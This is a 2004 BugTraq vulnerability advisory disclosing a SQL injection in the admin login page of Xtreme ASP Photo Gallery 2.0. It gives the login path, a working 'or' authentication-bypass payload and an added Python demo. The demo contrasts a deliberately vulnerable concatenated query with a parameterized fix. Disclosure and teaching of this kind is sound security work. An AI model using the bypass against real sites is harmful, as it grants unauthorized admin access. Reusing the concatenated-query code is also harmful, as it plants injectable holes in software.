BugTraq
Xtreme ASP Photo Gallery Jan 15 2004 10:58PM
posidron tripbit org


Tripbit Security Research
tripbit.org

Security Advisory

Advisory ID:   TA-150104
Release Date:  January 15th, 2004
Application:   Xtreme ASP Photo Gallery 2.0
Severity:      Medium/High
Impact:        Admin access
Class:         Input Validation Error
Vendor:        http://www.pensacolawebdesigns.com/

Overview
----------------------------------------------------------------------------------------

XTREME ASP Photo Gallery is a photo gallery that allows easy photo management and complete administration via a web based interface. This interface offers many more features than conventional web based photo galleries do. With XTREME ASP Photo Gallery, you can configure everything including colors, text styles, the number of images displayed per page and much more.

Details
----------------------------------------------------------------------------------------

Xtreme ASP Photo Gallery Version 2.0 is prone to a common SQL injection vulnerability. The problem occurs when handling user-supplied username and password data passed to the authentication procedure: the values are placed into the login query without filtering, so a single quote in either field terminates the string literal and the remainder of the input is interpreted as SQL.

http://[host]/photoalbum/admin/adminlogin.asp

If we type:

Username: 'or'
Password: 'or'

we gain admin access to the password protected administrative pages.
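The following is an added example, not code from the advisory or from the vendor's product. It reproduces the class of bug described above in Python against an in-memory SQLite table (the product itself is classic ASP; its real backend, table and column names are unknown, so `admins`, `username` and `password` are assumptions). It shows the query text produced by the advisory's `'or'` payload, a login function that concatenates input the way the vulnerable page does, and the same check rewritten with bound parameters. Because engines differ in how a bare `''` is treated in a boolean context, the login demonstration uses the explicit tautology `' or ''='`, which is true on any SQL engine.

```python
import sqlite3


def make_db():
    """Constructed sample data (assumed schema, plaintext password for brevity)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admins VALUES ('admin', 'hunter2')")
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    """Build the login query the way a classic-ASP login page of the era
    typically did: by concatenating Request.Form values straight into the
    SQL text. Returned as a string so the effect of a quote is visible."""
    return ("SELECT COUNT(*) FROM admins WHERE username='" + username +
            "' AND password='" + password + "'")


def vulnerable_login(conn, username, password):
    """Authenticate with the concatenated query. A single quote in either
    field ends the string literal and the rest of the input is parsed
    as SQL, so a tautology satisfies the WHERE clause for every row."""
    sql = build_vulnerable_query(username, password)
    return conn.execute(sql).fetchone()[0] > 0


def safe_login(conn, username, password):
    """Same check with bound parameters: the input is always data, never SQL."""
    row = conn.execute(
        "SELECT COUNT(*) FROM admins WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] > 0


if __name__ == "__main__":
    db = make_db()
    # The advisory's payload, as it ends up in the query text.
    print(build_vulnerable_query("'or'", "'or'"))
    tautology = "' or ''='"
    print("concatenated query:", vulnerable_login(db, tautology, tautology))
    print("parameterized query:", safe_login(db, tautology, tautology))
```

With the tautology payload the concatenated version authenticates without knowing any credential, while the parameterized version rejects it because the quotes and `or` never reach the SQL parser. Note that SQLite evaluates a bare `''` as false, so the advisory's literal `'or'` input does not log in against this sample database; the query text it produces is still shown to make the injection point clear.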

Recommendation
----------------------------------------------------------------------------------------

No solution for the moment. Until a vendor fix is available, administrators can restrict access to the /photoalbum/admin/ directory at the web server level; a proper fix requires the login code to pass the username and password to the database as bound parameters instead of concatenating them into the query.

Vendor Response
----------------------------------------------------------------------------------------

The vendor has reportedly been notified of this report.

Disclaimer
----------------------------------------------------------------------------------------

The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

Additional information
----------------------------------------------------------------------------------------

This vulnerability has been found and researched by:

posidron posidron (at) tripbit (dot) org
rushjo rushjo (at) tripbit (dot) org

You can find the latest version of this advisory at:

http://www.tripbit.org/advisories/TA-150104.txt
